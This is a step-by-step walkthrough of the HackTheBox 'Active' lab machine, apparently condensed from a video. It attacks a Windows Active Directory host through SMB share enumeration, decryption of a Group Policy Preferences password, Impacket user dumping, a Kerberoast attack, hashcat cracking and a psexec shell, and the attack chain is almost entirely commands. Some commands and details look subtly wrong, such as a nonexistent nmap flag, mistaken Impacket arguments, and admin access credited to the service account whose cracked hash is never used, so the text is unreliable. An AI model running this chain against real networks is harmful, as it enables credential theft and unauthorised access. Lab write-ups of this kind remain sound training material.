HackTheBox - Active

Introduction

This tutorial provides a comprehensive guide to conducting reconnaissance and exploiting a Windows Active Directory environment based on a detailed walkthrough from a HackTheBox video. By following these steps, you'll learn how to utilize tools like Nmap, SMBMap, and Impacket effectively, enabling you to identify vulnerabilities and gather critical information from the target system.

Chapter 1: Begin of Recon

1. Run Nmap Scan

   • Use the following command to perform a comprehensive scan:

     nmap -sC -sD -sV -oA active 10.10.10.100
     

   • Important Ports Identified:
     • DNS on port 53 (Microsoft DNS version indicates Windows 2008 R2 or Windows 7)
     • Kerberos on port 88 (indicates Active Directory presence)
     • SMB on port 445 (check for open shares)

2. Modify Host File

   • Add entries to your /etc/hosts file for easier access:

     10.10.10.100 active.htb
     

3. Check Time Synchronization

   • Ensure your system time is within a minute of the target's time for Kerberos authentication.

4. Investigate SMB Shares

   • Use Nmap to check for SMB shares:

     nmap --script safe -p 445 10.10.10.100
     

Chapter 2: Poking at DNS

1. Perform DNS Recon

   • Use nslookup to query the DNS server:

     nslookup 10.10.10.100
     

2. Scan Entire Subnet

   • Execute a DNS recon scan:

     dnsrecon -d active.htb -r 10.10.10.0/24
     

Chapter 3: Examining Nmap Scripts

1. List Available Nmap Scripts

   • Find all NSE scripts:

     locate -R "*.nse"
     

2. Run SMB Related Scripts

   • To explore SMB options, filter results:

     nmap --script smb-* -p 445 10.10.10.100
     

Chapter 4: Using SMB Client

1. List SMB Shares Using smbclient
   • Execute the following command for anonymous authentication:

     smbclient -L 10.10.10.100 -U ''
     

Chapter 5: Utilizing SMBMap

1. List Shares with SMBMap

   • Use SMBMap for detailed share information:

     smbmap -H 10.10.10.100
     

2. Pillaging Replication Share

   • Access the replication share:

     smbmap -H 10.10.10.100 -r replication
     

3. Download Groups XML

   • Search for sensitive information in groups.xml:

     smbmap -A active.htb -H 10.10.10.100 -r replication -q
     

Chapter 6: Extracting Passwords

1. Decrypt Passwords from groups.xml

   • Use gpp-decrypt to extract passwords:

     gpp-decrypt <encrypted_password>
     

2. Store Credentials Securely

   • Keep the credentials documented for further use.

Chapter 7: Dumping Active Directory Users

1. Install Impacket

   • Follow installation instructions for Impacket.

2. Dump Users

   • Use the following command to get AD users:

     python getADUsers.py -all -dc-ip 10.10.10.100 -username SVC_TGS -password "<password>"
     

Chapter 8: Kerberoast Attack

1. Run Kerberoast with Impacket

   • Execute the command to extract Kerberos tickets:

     python GetUserSPNs.py -dc-ip 10.10.10.100 -username SVC_TGS -password "<password>"
     

2. Crack TGS Hash

   • Use Hashcat to crack the TGS hash:

     hashcat -m 13100 hashes.txt /path/to/wordlist.txt
     

Chapter 9: Gaining Access

1. Use PSexec to Access the Target
   • Execute the following command to gain admin access:

     psexec.py active.htb/SVC_TGS:<password> 10.10.10.100
     

Conclusion

In this tutorial, we covered the essential steps for conducting reconnaissance and exploiting a Windows Active Directory environment. By leveraging tools such as Nmap, SMBMap, and Impacket, you can gather valuable information and potentially gain unauthorized access to resources. Always remember to conduct such activities ethically and within legal boundaries. Next steps could include further penetration testing techniques or exploring defenses against such attacks.